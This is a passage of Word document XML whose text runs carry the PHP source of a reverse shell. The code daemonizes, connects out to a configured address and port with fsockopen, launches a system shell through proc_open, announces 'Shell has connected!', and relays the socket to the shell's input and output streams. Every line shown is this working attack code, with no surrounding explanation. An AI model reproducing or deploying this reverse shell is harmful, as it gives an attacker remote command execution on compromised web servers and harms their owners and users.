          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>;', $data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C63F15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$data = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>str_replace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>('&gt;', '&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>gt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>;', $data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412F58A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$data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5068A64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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C0DB8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read($stream, $name, $buffer) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B3623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(($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACB1E4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$this-&gt;error = true;                            // set global error flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D55B59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"STRM_ERROR: Cannot read from {$name}, script will now exit...\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C24C20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2934E57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return $data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D537BA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36BC118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write($stream, $name, $data) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F87FA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(($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43469BF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$this-&gt;error = true;                            // set global error flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DAFCB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"STRM_ERROR: Cannot write to {$name}, script will now exit...\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1E077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0D1069C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return $bytes;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B67DB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90286F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read/write method for non-blocking streams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71007A4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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>rw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>($input, $output,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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>oname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5F2F9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while (($data = $this-&gt;read($input,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$this-&gt;buffer)) &amp;&amp; $this-&gt;write($output, $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>oname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>, $data)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B15FD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($this-&gt;os === 'WINDOWS' &amp;&amp; $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>oname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> === 'STDIN') { $this-&gt;clen += </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>strlen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>($data); } // calculate the command length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB6867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$this-&gt;dump($data); // script's dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785212B1"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FA413B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5495911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read/write method for blocking streams (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>e.g.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> for STDOUT and STDERR on Windows OS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08ED484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we must read the exact byte length from a stream and not a single byte more</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FA827E"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private function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>brw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>($input, $output,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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>oname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526CE62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 xml:space="preserve"> =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($input);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C7345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$size =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['size'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133018A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($this-&gt;os === 'WINDOWS' &amp;&amp;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xml:space="preserve"> === 'STDOUT' &amp;&amp; $this-&gt;clen) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372F25E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for some reason Windows OS pipes STDIN into STDOUT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CDB0D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we do not like that</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C06CCA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we need to discard the data from the stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE4F4C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while ($this-&gt;clen &gt; 0 &amp;&amp; ($bytes = $this-&gt;clen &gt;= $this-&gt;buffer ? $this-&gt;buffer : $this-&gt;clen) &amp;&amp; $this-&gt;read($input,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$bytes)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498EA02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$this-&gt;clen -= $bytes;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA1C9F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$size -= $bytes;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCDB02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9EB43E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51989AE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while ($size &gt; 0 &amp;&amp; ($bytes = $size &gt;= $this-&gt;buffer ? $this-&gt;buffer : $size) &amp;&amp; ($data = $this-&gt;read($input, $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>iname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>, $bytes)) &amp;&amp; $this-&gt;write($output, $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>oname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>, $data)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667B93B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$size -= $bytes;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDEC0B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$this-&gt;dump($data); // script's dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559472F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3B0B4DF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3BB9D2B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public function run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D5B13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($this-&gt;detect() &amp;&amp; !$this-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>daemonize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFC52B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$this-&gt;settings();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFCFD41"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8CA63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SOCKET BEGIN -----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED172B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$socket = @fsockopen($this-&gt;addr, $this-&gt;port, $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>errno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>, $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>errstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>, 30);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442A64B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(!$socket) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2966AE1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"SOC_ERROR: {$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>errno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>}: {$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>errstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>}\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6331EB51"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1D746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stream_set_blocking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>($socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0704B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4D630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SHELL BEGIN -----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DE0A3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$process = @proc_open($this-&gt;shell, $this-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>descriptorspec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>, $pipes, null, null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063AE30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(!$process) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2477D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"PROC_ERROR: Cannot start the shell\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E15FC9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C893C3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foreach ($pipes as $pipe) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D8361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stream_set_blocking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>($pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9FF30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4F3B829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0D273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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    // ----- WORK BEGIN -----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A6D681"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$status = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>proc_get_status</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>($process);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437FE50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@fwrite($socket, "SOCKET: Shell has connected! PID: {$status['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>']}\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C83544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do {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7544195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ab/>
      </w:r>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">$status = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>proc_get_status</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>($process);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508D866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feof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>($socket)) { // check for end-of-file on SOCKET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606B2A2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"SOC_ERROR: Shell connection has been terminated\n"; break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3D5EE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feof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>($pipes[1]) || !$status['running']) {                 // check for end-of-file on STDOUT or if process is still running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6FA9D9"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"PROC_ERROR: Shell process has been terminated\n";   break; // </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>feof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>() does not work with blocking streams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D3DE6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use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>proc_get_status</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>() instead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4008A0F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$streams = array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2614D5E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'read'   =&gt; array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085E465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'write'  =&gt; null,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BD98D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'except' =&gt; null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9DB8D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2CC8DB2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num_changed_streams</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> = @stream_select($streams['read'], $streams['write'], $streams['except'], 0); // wait for stream changes | will not wait on Windows OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308D741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num_changed_streams</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
